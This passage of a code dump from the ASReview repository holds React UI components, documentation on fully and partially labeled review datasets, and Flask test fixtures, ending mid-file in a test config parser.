"content_id": "bb330c5b8cb45216446a5fc2344d7afb6958daff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 344, "license_type": "permissive", "max_line_length": 67, "num_lines": 6, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as Filter } from \"./Filter\";\nexport { default as HistoryPage } from \"./HistoryPage\";\nexport { default as LabelChip } from \"./LabelChip\";\nexport { default as LabeledRecord } from \"./LabeledRecord\";\nexport { default as LabeledRecordCard } from \"./LabeledRecordCard\";\nexport { default as RecordCardNote } from \"./RecordCardNote\";\n" }, { "alpha_fraction": 0.753739058971405, "alphanum_fraction": 0.7568334341049194, "avg_line_length": 38.57143020629883, "blob_id": "02883ac7e20d331666ddb8a1f2d3f0c4f4382ad8", "content_id": "f23903a67ae6362632c4ddff989b2aa039833889", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3878, "license_type": "permissive", "max_line_length": 124, "num_lines": 98, "path": "/docs/source/data_labeled.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Fully and partially labeled data\n================================\n\nFully and partially labeled datasets serve a special role in the ASReview\ncontext. These datasets have review decisions for a subset of the records or\nfor all records in the dataset. \n\n.. tip::\n\n :ref:`data_labeled:Partially labeled data` is useful in the Oracle\n mode, whereas :ref:`data_labeled:Fully labeled data` is useful in the Simulation\n and Exploration mode.\n\n\n\nLabel format\n------------\n\n\nFor tabular datasets (:doc:`e.g., CSV, XLSX <data_format>`), the dataset\nshould contain a column called \"included\" or \"label\" (See :ref:`Data format\n<column-names>` for all naming conventions), which is filled with ``1``'s or\n``0``'s for the records that are already screened, or selected by experts to\nbe used for prior knowledge. The value is left empty for the records that you\nhaven't screened yet, or which are added to the dataset.\n\n\n\nFor the RIS file format, the labels ``ASReview_relevant``,\n``ASReview_irrelevant``, and ``ASReview_not_seen``) can be stored with the N1\n(Notes) tag. An example of a RIS file with labels in the N1 tag can be found\nin the `ASReview GitHub repository\n<https://github.com/asreview/asreview/blob/master/tests/demo_data/baseline_tag-notes_labels.ris>`_.\nAll labels in this example are valid ways to label the data. \n\n\n.. note::\n\n Exported files containing labeling decisions can be imported into ASReview LAB again,\n and whereafter all labels are recognized.\n\n\n\nPartially labeled data\n----------------------\n\n.. tip::\n\n\tUseful for Oracle projects. Read more about :ref:`project_create:Project modes`.\n\nPartially labeled datasets are datasets with a labeling decision for a subset\nof the records in the dataset and no decision for another subset. \n\nA partially labeled dataset can be obtained by exporting results from ASReview\nLAB or other software. It can also be constructed given the format described\nabove by merging a labeled dataset with new unlabeled records.\n\nPartially labeled datasets are useful as the labels will be recognized by\nASReview LAB as :ref:`Prior Knowledge <project_create:Select Prior Knowledge>`, and labels are used to\ntrain the first iteration of the active learning model.\n\n.. note::\n\n Merging labeled with unlabeled data should be done outside ASReview LAB, for\n example, with :ref:`data:Citation Managers`.\n\n\nFully labeled data\n------------------\n\n.. tip::\n\n\tUseful for Simulation and Exploration projects. Read more about :ref:`project_create:Project modes`.\n\nFully labeled datasets are datasets with a labeling decision for each record in\nthe dataset. Fully labeled datasets are useful for exploration or simulation\npurposes (see also :ref:`simulation_overview:What is a simulation?` and\n:ref:`project_create:Project modes`). \n\n\nBenchmark datasets\n~~~~~~~~~~~~~~~~~~\n\nThe `ASReview research project <https://asreview.ai/about/>`_ collects fully\nlabeled datasets published open access. The labeled datasets are PRISMA-based\nsystematic reviews or meta-analyses on various research topics. They can be\nuseful for teaching purposes or for testing the performance of (new) active\nlearning models. The datasets and their metadata are available via the\n`SYNERGY Dataset <https://github.com/asreview/synergy-dataset>`_ repository. In\nASReview LAB, these datasets are found under \"Benchmark Datasets\".\n\nThe Benchmark Datasets are directly available in the software. During the\n:ref:`project_create:Add Dataset` step of the project setup, there is a panel\nwith all the datasets. The datasets can be selected and used directly.\nBenchmark datasets are also available via the :doc:`simulation_cli`. Use the prefix\n``synergy:`` followed by the identifier of the dataset (see `Synergy Dataset <https://github.com/asreview/synergy-dataset>`_\nrepository). For example, to use the Van de Schoot et al. (2018) dataset, use\n``synergy:van_de_schoot_2018``.\n" }, { "alpha_fraction": 0.422229528427124, "alphanum_fraction": 0.42486023902893066, "avg_line_length": 27.157407760620117, "blob_id": "6ee7d0ab0eafc9f418e7a9f64c8baa9e01f5fcaa", "content_id": "e3b9dfe8264bb0385663d104fd28395b2c7a18a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6082, "license_type": "permissive", "max_line_length": 86, "num_lines": 216, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorUnlabeled.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { connect } from \"react-redux\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport TruncateMarkup from \"react-truncate-markup\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n Divider,\n Link,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { ExplorationModeRecordAlert } from \"../../../StyledComponents/StyledAlert.js\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\n\nconst PREFIX = \"PriorUnlabeled\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n icon: `${PREFIX}-icon`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n width: \"100%\",\n [`& .${classes.root}`]: {\n borderRadius: 16,\n },\n\n [`& .${classes.icon}`]: {\n marginLeft: \"auto\",\n },\n}));\n\nconst PriorUnlabeled = (props) => {\n const queryClient = useQueryClient();\n const [recordReadMore, setRecordReadMore] = React.useState(null);\n\n const { error, isError, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n mutationKey: \"mutatePriorKnowledge\",\n onSuccess: (data, variables) => {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"all\"] },\n ]);\n if (!variables.label) {\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"irrelevant\"] },\n ]);\n } else {\n queryClient.invalidateQueries([\n \"fetchLabeledRecord\",\n { subset: [\"relevant\"] },\n ]);\n }\n if (props.keyword) {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchPriorSearch\",\n {\n project_id: props.project_id,\n keyword: props.keyword,\n },\n ],\n (prev) => {\n return {\n ...prev,\n result: prev.result.map((record) => {\n return {\n ...record,\n included:\n record.id === variables.doc_id\n ? variables.label\n : record.included,\n };\n }),\n };\n },\n );\n } else {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchPriorRandom\",\n {\n project_id: props.project_id,\n n: props.nRecords,\n subset:\n props.mode !== projectModes.ORACLE ? props.subset : null,\n },\n ],\n (prev) => {\n return {\n ...prev,\n result: prev.result.map((record) => {\n return {\n ...record,\n included:\n record.id === variables.doc_id\n ? variables.label\n : record.included,\n };\n }),\n };\n },\n );\n }\n },\n },\n );\n\n const isDebugInclusion = () => {\n if (props.record) {\n return props.record._debug_label === 1;\n }\n };\n\n return (\n <Root>\n {isError && (\n <Box sx={{ pt: 8 }}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={reset}\n button={true}\n />\n </Box>\n )}\n {!isError && (\n <Card elevation={3} className={classes.root}>\n {props.record._debug_label !== null && (\n <ExplorationModeRecordAlert\n label={!isDebugInclusion() ? \"irrelevant\" : \"relevant\"}\n />\n )}\n <CardContent className=\"record-card-content\">\n <Typography gutterBottom variant=\"h6\">\n {props.record.title ? props.record.title : \"No title available\"}\n </Typography>\n <TruncateMarkup\n lines={props.record.id === recordReadMore ? Infinity : 6}\n ellipsis={\n <span>\n ...{\" \"}\n <Link\n component=\"button\"\n underline=\"none\"\n onClick={() => setRecordReadMore(props.record.id)}\n >\n read more\n </Link>\n </span>\n }\n >\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.record.abstract\n ? props.record.abstract\n : \"No abstract available\"}\n </Typography>\n </TruncateMarkup>\n </CardContent>\n <Divider />\n <CardActions sx={{ justifyContent: \"space-between\" }}>\n <Typography variant=\"body2\" sx={{ ml: 1 }}>\n Is this record relevant?\n </Typography>\n <Box>\n <Button\n onClick={() => {\n mutate({\n project_id: props.project_id,\n doc_id: props.record.id,\n label: 1,\n note: \"\",\n initial: true,\n is_prior: 1,\n });\n }}\n size=\"small\"\n >\n Yes\n </Button>\n <Button\n onClick={() => {\n mutate({\n project_id: props.project_id,\n doc_id: props.record.id,\n label: 0,\n note: \"\",\n initial: true,\n is_prior: 1,\n });\n }}\n size=\"small\"\n >\n No\n </Button>\n </Box>\n </CardActions>\n </Card>\n )}\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorUnlabeled);\n" }, { "alpha_fraction": 0.4735788106918335, "alphanum_fraction": 0.4742462933063507, "avg_line_length": 36.610877990722656, "blob_id": "ffa32d53f7b05a18d10b0ae1e4261a8dbb6940bb", "content_id": "cb40af3038c1880c8d503d77874922a20366d4fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8989, "license_type": "permissive", "max_line_length": 106, "num_lines": 239, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/ModelForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n FormControl,\n InputLabel,\n Link,\n MenuItem,\n Select,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { SelectItem } from \"../../ProjectComponents\";\nimport { MouseOverPopover } from \"../../StyledComponents/StyledPopover.js\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ModelForm = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const {\n data: modelOptions,\n error: fetchModelOptionsError,\n isError: isFetchModelOptionsError,\n isFetched: isFetchedModelOptions,\n isFetching: isFetchingModelOptions,\n isSuccess: isSuccessModelOptions,\n } = useQuery(\"fetchModelOptions\", ProjectAPI.fetchModelOptions, {\n refetchOnWindowFocus: false,\n });\n\n const {\n data: modelConfig,\n error: fetchModelConfigError,\n isError: isFetchModelConfigError,\n isFetched: isFetchedModelConfig,\n isFetching: isFetchingModelConfig,\n isSuccess: isSuccessModelConfig,\n } = useQuery(\n [\"fetchModelConfig\", { project_id }],\n ProjectAPI.fetchModelConfig,\n {\n enabled: project_id !== null,\n refetchOnWindowFocus: false,\n },\n );\n\n const returnModelError = () => {\n if (isFetchModelOptionsError && !isFetchModelConfigError) {\n return fetchModelOptionsError?.message;\n }\n if (isFetchModelConfigError && !isFetchModelOptionsError) {\n return fetchModelConfigError?.message;\n }\n if (isFetchModelOptionsError && isFetchModelConfigError) {\n return (\n fetchModelOptionsError?.message + \" \" + fetchModelConfigError?.message\n );\n }\n };\n\n const refetchModel = () => {\n if (isFetchModelOptionsError) {\n queryClient.resetQueries(\"fetchModelOptions\");\n }\n if (isFetchModelConfigError) {\n queryClient.resetQueries(\"fetchModelConfig\");\n }\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n <Box>\n <TypographySubtitle1Medium>Model</TypographySubtitle1Medium>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n An active learning model consists of a feature extraction technique,\n a classifier, a query strategy, and a balance strategy. The default\n setup (TF-IDF, Naive Bayes, Maximum, Dynamic resampling) overall has\n fast and excellent performance.{\" \"}\n <Link\n underline=\"none\"\n href={`https://asreview.nl/blog/active-learning-explained/`}\n target=\"_blank\"\n >\n Learn more\n </Link>\n </Typography>\n </Box>\n {!isFetchModelOptionsError &&\n !isFetchModelConfigError &&\n !isFetchingModelOptions &&\n !isFetchingModelConfig &&\n isFetchedModelOptions &&\n isFetchedModelConfig &&\n isSuccessModelOptions &&\n isSuccessModelConfig && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n <MouseOverPopover title=\"Select feature extraction technique when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"feature-extraction-select-label\">\n Feature extraction technique\n </InputLabel>\n <Select\n id=\"select-feature-extraction\"\n name=\"feature_extraction\"\n label=\"Feature extraction technique\"\n value={modelConfig?.feature_extraction}\n >\n {modelOptions?.feature_extraction.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n modelConfig?.feature_extraction === value.name\n }\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select classifier when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"classifier-select-label\">\n Classifier\n </InputLabel>\n <Select\n labelId=\"select-classifier-label\"\n id=\"select-classifier\"\n name=\"classifier\"\n label=\"Classifier\"\n value={modelConfig?.model}\n >\n {modelOptions?.classifier.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={modelConfig?.model === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select query strategy when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"query-strategy-select-label\">\n Query strategy\n </InputLabel>\n <Select\n id=\"select-query-strategy\"\n name=\"query_strategy\"\n label=\"Query strategy\"\n value={modelConfig?.query_strategy}\n >\n {modelOptions?.query_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={modelConfig?.query_strategy === value.name}\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n <MouseOverPopover title=\"Select balance strategy when creating a new project\">\n <FormControl disabled fullWidth variant=\"filled\">\n <InputLabel id=\"balance-strategy-select-label\">\n Balance strategy\n </InputLabel>\n <Select\n id=\"select-balance-strategy\"\n name=\"balance_strategy\"\n label=\"Balance strategy\"\n value={modelConfig?.balance_strategy}\n >\n {modelOptions?.balance_strategy.map((value) => {\n return (\n <MenuItem\n key={`result-item-${value.name}`}\n checked={\n modelConfig?.balance_strategy === value.name\n }\n value={value.name}\n >\n <SelectItem\n primary={value.label}\n secondary={value.description}\n />\n </MenuItem>\n );\n })}\n </Select>\n </FormControl>\n </MouseOverPopover>\n </Stack>\n </Box>\n )}\n {(isFetchModelOptionsError || isFetchModelConfigError) && (\n <InlineErrorHandler\n message={returnModelError()}\n refetch={refetchModel}\n button={true}\n />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default ModelForm;\n" }, { "alpha_fraction": 0.4998127818107605, "alphanum_fraction": 0.5025275945663452, "avg_line_length": 26.180662155151367, "blob_id": "5e9ef5f0c6322d2d12d62326b316819467dfb904", "content_id": "41ac1697e16ebb28a04be9f1ea843873a030706f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10682, "license_type": "permissive", "max_line_length": 78, "num_lines": 393, "path": "/asreview/webapp/src/Components/DrawerItemContainer.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useIsFetching, useQueryClient } from \"react-query\";\nimport { useSelector } from \"react-redux\";\nimport { Route, Routes, useParams } from \"react-router-dom\";\nimport {\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogTitle,\n Divider,\n Fade,\n List,\n ListItem,\n ListItemButton,\n ListItemIcon,\n ListItemText,\n Tooltip,\n Typography,\n} from \"@mui/material\";\n\nimport { styled } from \"@mui/material/styles\";\nimport { Diversity3, Help, Payment, Settings } from \"@mui/icons-material\";\n\nimport { DrawerItem, ElasGame } from \"../Components\";\nimport { ProjectAPI } from \"../api/index.js\";\nimport {\n communityURL,\n donateURL,\n projectModes,\n projectStatuses,\n} from \"../globals.js\";\nimport Finished from \"../images/ElasHoldingSIGNS_Finished.svg\";\nimport InReview from \"../images/ElasHoldingSIGNS_InReview.svg\";\nimport SetUp from \"../images/ElasHoldingSIGNS_SetUp.svg\";\n\nconst PREFIX = \"DrawerItemContainer\";\n\nconst classes = {\n topSection: `${PREFIX}-topSection`,\n bottomSection: `${PREFIX}-bottomSection`,\n icon: `${PREFIX}-icon`,\n projectInfo: `${PREFIX}-projectInfo`,\n yourProject: `${PREFIX}-yourProject`,\n projectTitle: `${PREFIX}-projectTitle`,\n stateElas: `${PREFIX}-stateElas`,\n};\n\nconst StyledList = styled(List)(({ theme }) => ({\n overflow: \"hidden\",\n display: \"flex\",\n flexDirection: \"column\",\n flexGrow: 1,\n [`& .${classes.topSection}`]: {\n overflowX: \"hidden\",\n overflowY: \"auto\",\n flex: \"1 1 auto\",\n },\n\n [`& .${classes.bottomSection}`]: {\n overflow: \"hidden\",\n flex: \"0 0 auto\",\n },\n\n [`& .${classes.icon}`]: {\n paddingLeft: 8,\n },\n\n [`& .${classes.projectInfo}`]: {\n display: \"block\",\n \"& > *\": {\n marginTop: theme.spacing(2),\n },\n },\n\n [`& .${classes.yourProject}`]: {\n paddingLeft: 12,\n paddingRight: 12,\n },\n\n [`& .${classes.projectTitle}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 2,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n\n [`& .${classes.stateElas}`]: {\n width: \"100%\",\n maxWidth: \"140px\",\n display: \"block\",\n margin: \"auto\",\n },\n}));\n\nconst DrawerItemContainer = (props) => {\n const { project_id } = useParams();\n const authentication = useSelector((state) => state.authentication);\n const allowTeams = useSelector((state) => state.allow_teams);\n const queryClient = useQueryClient();\n\n const isFetchingInfo = useIsFetching(\"fetchInfo\");\n\n const [projectInfo, setProjectInfo] = React.useState(null);\n\n const fetchProjectInfo = React.useCallback(async () => {\n const data = await queryClient.fetchQuery(\n [\"fetchInfo\", { project_id }],\n ProjectAPI.fetchInfo,\n );\n setProjectInfo(data);\n }, [project_id, queryClient]);\n\n const returnElasState = () => {\n // setup\n if (\n projectInfo?.reviews[0] === undefined ||\n projectInfo?.reviews[0].status === projectStatuses.SETUP\n ) {\n return SetUp;\n }\n\n // review\n if (projectInfo?.reviews[0].status === projectStatuses.REVIEW) {\n return InReview;\n }\n\n // finished\n if (projectInfo?.reviews[0].status === projectStatuses.FINISHED) {\n return Finished;\n }\n };\n\n /**\n * Drawer items on home page\n * Any change here requires change in DrawerItem\n */\n const drawerItemsHomePage = [\n {\n path: \"/projects\",\n label: \"Projects\",\n },\n ];\n /**\n * Drawer items on project page\n * Any change here requires change in DrawerItem\n */\n const drawerItemsProjectPage = [\n {\n path: \"\",\n label: \"Analytics\",\n },\n {\n path: \"review\",\n label: \"Review\",\n },\n {\n path: \"history\",\n label: \"History\",\n },\n ...(authentication && allowTeams\n ? [\n {\n path: \"team\",\n label: \"Team\",\n },\n ]\n : []),\n {\n path: \"export\",\n label: \"Export\",\n },\n {\n path: \"details\",\n label: \"Details\",\n },\n ];\n\n const [openGame, setOpenGame] = React.useState(false);\n const [attemps, setAttempts] = React.useState(0);\n\n const toggleGame = () => {\n if (!openGame) {\n setAttempts(0);\n }\n setOpenGame(!openGame);\n };\n\n const addAttempt = () => {\n setAttempts(attemps + 1);\n };\n\n const descriptionElementRef = React.useRef(null);\n React.useEffect(() => {\n if (openGame) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [openGame]);\n\n React.useEffect(() => {\n if (project_id && isFetchingInfo) {\n fetchProjectInfo();\n } else {\n setProjectInfo(null);\n }\n }, [fetchProjectInfo, project_id, isFetchingInfo]);\n\n return (\n <StyledList aria-label=\"drawer item container\">\n {/* Top Section: Home page drawer */}\n <Routes>\n <Route\n path=\"*\"\n element={\n <Fade in>\n <div className={classes.topSection}>\n {drawerItemsHomePage.map((element, index) => {\n return (\n <DrawerItem\n key={index}\n path={element.path}\n label={element.label}\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n );\n })}\n </div>\n </Fade>\n }\n />\n\n {/* Top Section: Project page drawer */}\n <Route\n path=\"projects/:project_id/*\"\n element={\n <Fade in>\n <div className={classes.topSection}>\n <DrawerItem\n mobileScreen={props.mobileScreen}\n label=\"Projects\"\n path=\"/projects\"\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n {projectInfo && (\n <ListItem\n className={classes.projectInfo}\n onClick={toggleGame}\n >\n <img\n src={returnElasState()}\n alt=\"ElasState\"\n className={classes.stateElas}\n />\n\n <Fade in={props.onNavDrawer} unmountOnExit>\n <div className={classes.yourProject}>\n <Typography variant=\"subtitle2\">\n Your project\n </Typography>\n <Typography\n className={classes.projectTitle}\n variant=\"body2\"\n color=\"textSecondary\"\n >\n {projectInfo ? projectInfo.name : \"Null\"}\n </Typography>\n </div>\n </Fade>\n </ListItem>\n )}\n\n {projectInfo &&\n drawerItemsProjectPage\n .filter((element) => {\n return projectInfo?.mode !== projectModes.SIMULATION\n ? element\n : element.path !== \"review\";\n })\n .map((element, index) => {\n return (\n <DrawerItem\n key={index}\n path={element.path}\n label={element.label}\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n />\n );\n })}\n </div>\n </Fade>\n }\n />\n </Routes>\n\n {/* Bottom Section */}\n <div className={classes.bottomSection}>\n <Divider />\n {donateURL !== undefined && (\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Donate\">\n <ListItemButton\n component={\"a\"}\n color=\"inherit\"\n href={donateURL}\n target=\"_blank\"\n >\n <ListItemIcon className={classes.icon}>\n <Payment />\n </ListItemIcon>\n <ListItemText primary=\"Donate\" />\n </ListItemButton>\n </Tooltip>\n )}\n {communityURL !== undefined && (\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Community\">\n <ListItemButton\n component={\"a\"}\n color=\"inherit\"\n href={communityURL}\n target=\"_blank\"\n >\n <ListItemIcon className={classes.icon}>\n <Diversity3 />\n </ListItemIcon>\n <ListItemText primary=\"Community\" />\n </ListItemButton>\n </Tooltip>\n )}\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Settings\">\n <ListItemButton\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n props.toggleSettings();\n }}\n >\n <ListItemIcon className={classes.icon}>\n <Settings />\n </ListItemIcon>\n <ListItemText primary=\"Settings\" />\n </ListItemButton>\n </Tooltip>\n <Tooltip disableHoverListener={props.onNavDrawer} title=\"Help\">\n <ListItemButton\n onClick={() => {\n if (props.mobileScreen) {\n props.toggleNavDrawer();\n }\n props.toggleHelpDialog();\n }}\n >\n <ListItemIcon className={classes.icon}>\n <Help />\n </ListItemIcon>\n <ListItemText primary=\"Help\" />\n </ListItemButton>\n </Tooltip>\n </div>\n\n {/* Game */}\n <Dialog\n open={openGame}\n onClose={toggleGame}\n scroll={\"paper\"}\n fullWidth={true}\n maxWidth={\"lg\"}\n aria-labelledby=\"game-dialog-title\"\n aria-describedby=\"game-dialog-description\"\n >\n <DialogTitle id=\"game-dialog-title\">\n Elas Adventures Game (Attempts: {attemps})\n </DialogTitle>\n <DialogContent>\n <ElasGame addAttempt={addAttempt} />\n </DialogContent>\n <DialogActions>\n <Button onClick={toggleGame}>Take me back</Button>\n </DialogActions>\n </Dialog>\n </StyledList>\n );\n};\n\nexport default DrawerItemContainer;\n" }, { "alpha_fraction": 0.6692221164703369, "alphanum_fraction": 0.6721533536911011, "avg_line_length": 30.906475067138672, "blob_id": "69e56a08b82255b8a6708b3c7c8fc2272bd7dca6", "content_id": "e21f749421b4e724bfb9458a6eedf684fc531ef7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4435, "license_type": "permissive", "max_line_length": 74, "num_lines": 139, "path": "/asreview/webapp/tests/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom pathlib import Path\n\nimport pytest\nfrom sqlalchemy.orm import close_all_sessions\n\nfrom asreview.webapp import DB\nfrom asreview.webapp.start_flask import create_app\nfrom asreview.webapp.tests.utils import crud\n\nPROJECTS = [\n {\n \"mode\": \"explore\",\n \"name\": \"demo project\",\n \"authors\": \"asreview team\",\n \"description\": \"hello world\",\n },\n {\n \"mode\": \"explore\",\n \"name\": \"another demo project\",\n \"authors\": \"asreview team\",\n \"description\": \"hello world\",\n },\n]\n\n\ndef _get_app(app_type=\"auth-basic\", path=None):\n \"\"\"Create and returns test flask app based on app_type\"\"\"\n # set asreview path\n os.environ.update({\"ASREVIEW_PATH\": path})\n # get path of appropriate flask config\n base_dir = Path(__file__).resolve().parent / \"config\"\n if app_type == \"auth-basic\":\n config_path = str(base_dir / \"auth_basic_config.toml\")\n elif app_type == \"auth-no-creation\":\n config_path = str(base_dir / \"auth_no_creation.toml\")\n elif app_type == \"auth-verified\":\n config_path = str(base_dir / \"auth_verified_config.toml\")\n elif app_type == \"no-auth\":\n config_path = str(base_dir / \"no_auth_config.toml\")\n else:\n raise ValueError(f\"Unknown config {app_type}\")\n # create app\n app = create_app(flask_configfile=config_path)\n # and return it\n return app\n\n\[email protected](scope=\"function\", autouse=True)\ndef asreview_path_fixture(tmp_path_factory):\n \"\"\"Fixture that creates and removes the ASReview test\n directory for the entire session.\"\"\"\n # create an ASReview folder\n asreview_path = tmp_path_factory.mktemp(\"asreview-test\")\n assert Path(asreview_path).exists()\n assert len(list(Path(asreview_path).glob('*'))) == 0\n yield str(asreview_path.absolute())\n # Pytest handles removal of ASReview folder\n\n\n# unauthenticated app\[email protected]\ndef unauth_app(asreview_path_fixture):\n \"\"\"Create an unauthenticated version of the app.\"\"\"\n # create the app\n app = _get_app(\"no-auth\", path=asreview_path_fixture)\n with app.app_context():\n yield app\n\n\n# authenticated app\[email protected]\ndef auth_app(asreview_path_fixture):\n \"\"\"Create an authenticated app, account creation\n allowed.\"\"\"\n # create app\n app = _get_app(path=asreview_path_fixture)\n with app.app_context():\n yield app\n\n\[email protected]\ndef client_auth(asreview_path_fixture):\n \"\"\"Flask client for basic authenticated app, account\n creation allowed.\"\"\"\n app = _get_app(\"auth-basic\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_auth_no_creation(asreview_path_fixture):\n \"\"\"Flask client for an authenticated app, account\n creation not allowed.\"\"\"\n app = _get_app(\"auth-no-creation\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_auth_verified(asreview_path_fixture):\n \"\"\"Flask client for an authenticated app, account\n creation allowed, user accounts needs account\n verification.\"\"\"\n app = _get_app(\"auth-verified\", path=asreview_path_fixture)\n with app.app_context():\n yield app.test_client()\n crud.delete_everything(DB)\n close_all_sessions()\n DB.engine.raw_connection().close()\n\n\[email protected]\ndef client_no_auth(asreview_path_fixture):\n \"\"\"Flask client for an unauthenticated app.\"\"\"\n app = _get_app(\"no-auth\", path=asreview_path_fixture)\n # make sure we have the asreview_path\n with app.app_context():\n yield app.test_client()\n" }, { "alpha_fraction": 0.6412162184715271, "alphanum_fraction": 0.6466216444969177, "avg_line_length": 25.909090042114258, "blob_id": "e90331ffe70bf26aa4a23f677824cdf5f1ea6862", "content_id": "31caeaa4a0633f0afb0b476e80d76ab363d1b516", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "permissive", "max_line_length": 65, "num_lines": 55, "path": "/asreview/webapp/tests/utils/config_parser.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import configparser\nfrom pathlib import Path\n\nfrom asreview.webapp.authentication.models import User\n\nconfig_file = \"asreview.ini\"\nconfig_dir = \"config\"\n\nconfig = configparser.ConfigParser()\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nCONFIG_FILE = BASE_DIR.joinpath(config_dir).joinpath(config_file)\n\nconfig.read(CONFIG_FILE)\n\n\n# get user (1 of 3)\ndef get_user(test_user_id):\n \"\"\"Returns a User model based on a test user\n account that can be found in the config file.\n The test_user_id refers to the position of the\n user account credentials in the .ini file\n (1, 2, or 3)\"\"\"\n section = config[f\"user{test_user_id}\"]\n # create user\n user = User(\n section[\"email\"],\n email=section[\"email\"],\n 